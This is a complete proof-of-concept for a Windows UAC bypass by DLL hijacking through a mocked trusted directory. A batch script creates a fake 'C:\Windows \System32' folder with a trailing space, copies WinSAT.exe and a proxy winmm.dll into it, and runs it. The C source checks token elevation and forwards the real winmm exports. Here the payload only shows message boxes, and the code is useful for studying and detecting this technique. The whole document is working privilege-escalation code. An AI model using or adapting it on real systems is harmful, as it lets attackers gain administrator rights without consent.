UAC bypass complete POC

launcher.bat

cl /MT /LD winmm.c User32.lib Advapi32.lib

mkdir "\\?\C:\Windows "
mkdir "\\?\C:\Windows \System32"
copy "C:\Windows\System32\WinSAT.exe" "C:\Windows \System32\"
copy "winmm.dll" "C:\Windows \System32\"

"C:\Windows \System32\WinSAT.exe"

winmm.c

// See the artical https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
#define MMNOTIMER
#include <windows.h>

static HMODULE winmm;
static MMRESULT (*timeBeginPeriod_real)(UINT uPeriod);
static MMRESULT (*timeEndPeriod_real)(UINT uPeriod);

__declspec(dllexport) 
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  (void) hinstDLL;
  (void) lpvReserved;

  if (fdwReason == DLL_PROCESS_ATTACH)
  {
    HANDLE token;
    TOKEN_ELEVATION token_elevation;
    DWORD token_elevation_size;

    MessageBoxW(NULL, L"DLL has been attached to the process", L"Hijacker", MB_OK);

    OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token);
    token_elevation_size = sizeof(token_elevation);
    GetTokenInformation(token, TokenElevation, &token_elevation, sizeof(token_elevation), &token_elevation_size);
    CloseHandle(token);

    if (token_elevation.TokenIsElevated)
    {
      MessageBoxW(NULL, L"DLL is running within an elevated process", L"Hijacker", MB_OK);
    }

    winmm = LoadLibraryW(L"C:\\Windows\\System32\\winmm.dll");
    timeBeginPeriod_real = (MMRESULT (*)(UINT)) GetProcAddress(winmm, "timeBeginPeriod");
    timeEndPeriod_real = (MMRESULT (*)(UINT)) GetProcAddress(winmm, "timeEndPeriod");
  }
  else if (fdwReason == DLL_PROCESS_DETACH)
  {
    FreeLibrary(winmm);
  }
}

// There is some bug here

__declspec(dllexport) 
MMRESULT WINAPI timeBeginPeriod(UINT uPeriod)
{
  return timeBeginPeriod_real(uPeriod);
}

__declspec(dllexport) 
MMRESULT WINAPI timeEndPeriod(UINT uPeriod)
{
  return timeEndPeriod_real(uPeriod);
}